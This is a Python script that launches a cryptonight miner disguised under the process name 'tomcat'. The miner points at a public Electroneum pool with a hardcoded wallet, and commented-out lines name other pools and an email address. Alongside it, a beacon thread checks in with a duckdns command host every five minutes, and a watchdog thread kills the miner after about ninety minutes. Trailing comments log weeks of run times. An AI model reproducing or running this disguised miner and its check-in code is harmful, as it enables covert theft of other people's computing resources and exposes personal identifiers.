import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:07:01.764049
#2018-02-17 15:54:07.173286
#2018-02-17 17:42:06.256371
#2018-02-17 19:31:03.868771
#2018-02-17 21:19:05.675187
#2018-02-17 23:04:06.550429
#2018-02-18 00:51:05.615089
#2018-02-18 02:39:04.094012
#2018-02-18 04:27:03.981063
#2018-02-18 06:18:07.236856
#2018-02-18 08:08:03.760204
#2018-02-18 09:55:05.760408
#2018-02-18 11:42:01.356623
#2018-02-18 13:27:03.896887
#2018-02-18 15:17:02.030580
#2018-02-18 17:06:06.226753
#2018-02-18 18:53:04.959634
#2018-02-18 20:41:03.337642
#2018-02-18 22:26:06.728942
#2018-02-19 00:15:06.282989
#2018-02-19 02:01:06.790516
#2018-02-19 03:49:04.363560
#2018-02-19 05:33:01.893219
#2018-02-19 07:21:04.047876
#2018-02-19 09:11:04.543408
#2018-02-19 10:59:01.733909
#2018-02-19 12:46:06.614438
#2018-02-19 14:34:06.739785
#2018-02-19 16:22:07.394240
#2018-02-19 18:09:04.972817
#2018-02-19 19:55:02.196948
#2018-02-19 21:44:01.735978
#2018-02-19 23:32:04.045373
#2018-02-20 01:18:04.186388
#2018-02-20 03:09:07.430072
#2018-02-20 04:56:07.650213
#2018-02-20 06:40:07.062681
#2018-02-20 08:26:03.441370
#2018-02-20 10:11:01.454769
#2018-02-20 11:55:06.166112
#2018-02-20 13:43:11.318797
#2018-02-20 15:28:06.967519
#2018-02-20 17:15:10.243658
#2018-02-20 19:06:09.776890
#2018-02-20 20:55:10.527752
#2018-02-20 22:40:09.201765
#2018-02-21 00:23:07.218527
#2018-02-21 02:11:06.704715
#2018-02-21 03:57:07.045337
#2018-02-21 05:44:05.472132
#2018-02-21 07:33:04.994814
#2018-02-21 09:19:04.402280
#2018-02-21 11:07:06.641238
#2018-02-21 12:56:09.589201
#2018-02-21 14:44:11.248418
#2018-02-21 16:33:06.458794
#2018-02-21 18:23:04.960096
#2018-02-21 20:09:01.475951
#2018-02-21 21:55:07.110695
#2018-02-21 23:44:02.000877
#2018-02-22 01:34:01.383711
#2018-02-22 03:22:07.955057
#2018-02-22 05:10:04.696615
#2018-02-22 06:54:04.542388
#2018-02-22 08:42:04.863447
#2018-02-22 10:31:09.972523
#2018-02-22 12:17:10.109486
#2018-02-22 14:01:07.631186
#2018-02-22 15:48:10.659875
#2018-02-22 17:36:08.347999
#2018-02-22 19:23:01.873810
#2018-02-22 21:16:07.775660
#2018-02-22 23:03:07.975702
#2018-02-23 00:49:08.231651
#2018-02-23 02:38:01.284452
#2018-02-23 04:27:05.112315
#2018-02-23 06:14:07.028906
#2018-02-23 08:02:06.151166
#2018-02-23 10:16:08.481029
#2018-02-23 12:08:08.349486
#2018-02-23 13:56:09.422046
#2018-02-23 15:49:11.448320
#2018-02-23 17:36:10.094179
#2018-02-23 19:28:06.565068
#2018-02-23 21:13:08.604574
#2018-02-23 23:01:06.428436
#2018-02-24 00:48:04.057481
#2018-02-24 02:37:05.382795
#2018-02-24 04:31:06.586339
#2018-02-24 06:16:07.499415
#2018-02-24 08:05:03.206372
#2018-02-24 09:49:06.200143
#2018-02-24 11:44:04.524923
#2018-02-24 13:35:06.600260
#2018-02-24 15:22:05.977044
#2018-02-24 17:11:03.308625
#2018-02-24 19:03:04.908588
#2018-02-24 20:51:01.877768
#2018-02-24 23:09:07.209726
#2018-02-25 02:24:07.516041
#2018-02-25 05:42:01.684311
#2018-02-25 11:36:06.568526